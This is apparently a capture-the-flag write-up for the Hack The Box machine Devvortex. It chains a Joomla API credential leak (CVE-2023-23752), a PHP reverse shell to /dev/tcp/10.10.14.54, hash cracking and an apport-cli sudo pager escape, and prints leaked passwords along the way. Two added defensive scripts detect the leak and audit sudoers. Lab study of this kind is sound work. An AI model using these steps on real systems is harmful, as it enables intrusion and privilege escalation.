title: HTB-Devvortex
date: 2023-12-14 16:15:11
categories: HTB
tag: 渗透
Devvortex
Background for this box
Joomla unauthenticated access vulnerability (CVE-2023-23752):
Affected versions
4.0.0 <= Joomla <= 4.2.7
Request path
/api/index.php/v1/config/application?public=true
apport-cli privilege escalation
Information gathering
Scan with nmap while visiting the site in a browser.
Edit the hosts file:
10.10.11.242 devvortex.htb
Directory scanning turned up nothing useful:
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://devvortex.htb/FUZZ
Total requests: 45524
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 301 7 L 12 W 178 Ch "images"
000000002: 301 7 L 12 W 178 Ch "css"
000000004: 301 7 L 12 W 178 Ch "js"
Total time: 262.5244
Processed Requests: 5190
Filtered Requests: 5187
Requests/sec.: 19.76958
Next, fuzz for subdomains with wfuzz:
wfuzz -w <wordlist> -u "http://devvortex.htb" -H "Host: FUZZ.devvortex.htb" --hl 7
000000499: 200 501 L 1581 W 23221 Ch "dev"
Add it to hosts and browse to it:
10.10.11.242 dev.devvortex.htb
The nmap scan results are as follows:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 16:28 中国标准时间
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 81.91 seconds
Directory scan on the subdomain, which found:
000000001: 301 7 L 12 W 178 Ch "images"
000000040: 301 7 L 12 W 178 Ch "modules"
000000033: 301 7 L 12 W 178 Ch "includes"
000000037: 301 7 L 12 W 178 Ch "language"
000000026: 301 7 L 12 W 178 Ch "plugins"
000000013: 301 7 L 12 W 178 Ch "templates"
000000091: 301 7 L 12 W 178 Ch "media"
000000006: 200 501 L 1581 W 23221 Ch "index.php"
000000058: 301 7 L 12 W 178 Ch "cache"
000000138: 301 7 L 12 W 178 Ch "tmp"
000000132: 200 29 L 105 W 764 Ch "robots.txt"
000000151: 301 7 L 12 W 178 Ch "administrator"
000000201: 200 74 L 540 W 4940 Ch "README.txt"
000000198: 301 7 L 12 W 178 Ch "libraries"
000000209: 403 7 L 10 W 162 Ch ".DS_Store"
000000243: 200 0 L 0 W 0 Ch "configuration.php"
000000217: 301 7 L 12 W 178 Ch "components"
000000339: 200 172 L 1008 W 6858 Ch "htaccess.txt"
000000588: 200 501 L 1581 W 23221 Ch "home"
000000925: 403 7 L 10 W 162 Ch ".htpasswd"
000001005: 200 339 L 2968 W 18092 Ch "LICENSE.txt"
000001109: 301 7 L 12 W 178 Ch "cli"
000001149: 403 7 L 10 W 162 Ch ".thumbs"
Visiting README.txt identifies the application in use.
Visiting robots.txt yields several paths:
User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
/administrator/ is a login form that requires credentials.
So we search online for a vulnerability in this version.
Reverse shell
Exploit it with msfconsole:
use scanner/http/joomla_api_improper_access_checks
ID   Super User  Name        Username  Email                Send Email  Register Date        Last Visit Date      Group Names
--   ----------  ----        --------  -----                ----------  -------------        ---------------      -----------
649  *           lewis       lewis     lewis@devvortex.htb  1           2023-09-25 16:44:24  2023-12-14 08:58:39  Super Users
650              logan paul  logan     logan@devvortex.htb  0           2023-09-26 19:15:42                       Registered
[+] Config JSON saved to /home/iliy/.msf4/loot/20231214171300_default_10.10.11.242_joomla.config_395747.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla
db password P4ntherg0t1n5r3c0n##
db prefix sd4fg_
db user lewis
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
That gives us the database username and password.
Then log in, click System, and edit the code in the first entry under Templates. index.php is read-only and cannot be written, so we write into error.php instead, which works the same way.
Write:
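A defender-side check for the unauthenticated API access shown above, added here as an example that is not part of the original walkthrough: it parses constructed Apache-style access log lines (the client IP and the config path follow the walkthrough; the log lines themselves are made up) and flags requests to the Joomla v1 API config and users endpoints that carry public=true, which is what CVE-2023-23752 abuses.

```python
import re

# Constructed Apache-style access log lines: the client IP and the config path follow
# the walkthrough above; the lines themselves are made up for this example.
SAMPLE_LOG = """\
10.10.14.54 - - [14/Dec/2023:16:40:01 +0000] "GET /index.php HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
10.10.14.54 - - [14/Dec/2023:16:41:12 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.10.14.54 - - [14/Dec/2023:16:41:13 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 920 "-" "Mozilla/5.0"
10.10.14.54 - - [14/Dec/2023:16:41:20 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 90 "-" "Mozilla/5.0"
10.10.14.54 - - [14/Dec/2023:16:42:00 +0000] "GET /administrator/ HTTP/1.1" 200 4940 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# The two v1 API endpoints whose access check ?public=true bypasses on Joomla 4.0.0-4.2.7:
# config/application (configuration.php contents, including the DB password) and users.
SENSITIVE_API = re.compile(r'^/api/index\.php/v1/(config/application|users)(\?|$)')

def is_cve_2023_23752_attempt(path: str) -> bool:
    """True when the path hits a sensitive v1 endpoint with the public=true bypass."""
    if not SENSITIVE_API.match(path):
        return False
    query = path.partition('?')[2]
    params = dict(p.split('=', 1) if '=' in p else (p, '') for p in query.split('&') if p)
    return params.get('public', '').lower() == 'true'

def find_attempts(log_text: str) -> list:
    """One record per matching request; disclosed=True when the server answered 200."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cve_2023_23752_attempt(m['path']):
            hits.append({'ip': m['ip'], 'ts': m['ts'], 'path': m['path'],
                         'status': int(m['status']), 'disclosed': m['status'] == '200'})
    return hits

if __name__ == '__main__':
    for h in find_attempts(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['path']} -> {h['status']} disclosed={h['disclosed']}")
```

A 200 on either endpoint means the configuration or user list was actually served, so the DB password should be rotated as well as the install patched.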
system('bash -c "bash -i >& /dev/tcp/10.10.14.54/9999 0>&1"');
Then start a listener:
nc -lvnp 9999
Requesting that path then gives us a shell.
Check the users:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
fwupd-refresh:x:113:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
logan:x:1000:1000:,,,:/home/logan:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
The users with /bin/bash are:
root:x:0:0:root:/root:/bin/bash
logan:x:1000:1000:,,,:/home/logan:/bin/bash
So our target is now logan.
Log in to MySQL with the credentials obtained at the start.
select * from sd4fg_users gives logan's password hash, which we then crack with john.
That yields logan's password.
The cracked password is tequieromucho
With logan's password, log in.
Submit user.txt.
Privilege escalation
Then run sudo -l:
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
Via:
sudo /usr/bin/apport-cli -c test.log less
V
!/bin/bash
This gives root.
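An audit script for the kind of sudo rule exploited above, added here as an example that is not part of the original post: it parses constructed sudoers content (the logan line mirrors the sudo -l output; the other rules are made up) and flags commands that drop the caller into an interactive pager or editor unless the rule carries the NOEXEC tag, which is the sudoers mitigation for this class of escape.

```python
import re

# Constructed sudoers content: the logan line mirrors the sudo -l output above,
# every other rule is made up for the demonstration.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL
logan    ALL=(ALL:ALL) /usr/bin/apport-cli
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
ops      ALL=(root) NOEXEC: /usr/bin/apport-cli
"""

# Commands that hand the caller an interactive pager or editor (apport-cli opens one
# for "View report"), where a ! escape runs a shell with the rule's privileges.
PAGER_OR_EDITOR = {"apport-cli", "less", "more", "man", "vi", "vim", "nano"}

RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def parse_rule(line: str):
    """Parse one 'user host=(runas) [TAG:] cmd, cmd' line; None for anything else."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    cmds, tags = [], []  # tags carry over to later commands in the same rule (sudoers(5))
    for spec in m["cmds"].split(","):
        spec = spec.strip()
        while ":" in spec and spec.split(":", 1)[0].isupper():  # leading TAG: prefixes
            tag, spec = (s.strip() for s in spec.split(":", 1))
            tags.append(tag)
        cmds.append({"cmd": spec, "tags": list(tags)})
    return {"user": m["user"], "runas": m["runas"], "cmds": cmds}

def audit(sudoers_text: str) -> list:
    """Return rules whose command can spawn a shell through a pager/editor escape."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        for c in rule["cmds"]:
            if c["cmd"] == "ALL" or "NOEXEC" in c["tags"]:
                continue  # full sudo is a different finding; NOEXEC blocks the escape
            binary = c["cmd"].split()[0].rsplit("/", 1)[-1]
            if binary in PAGER_OR_EDITOR:
                findings.append({"user": rule["user"], "runas": rule["runas"], "cmd": c["cmd"],
                                 "tags": c["tags"], "fix": "add NOEXEC: or grant a non-interactive wrapper"})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"{f['user']} -> ({f['runas']}) {f['cmd']} {f['tags']}: {f['fix']}")
```

Run it against the real file with `sudo cat /etc/sudoers /etc/sudoers.d/*` piped in; the parser does not expand aliases or Cmnd_Alias lines, so those need to be checked by hand.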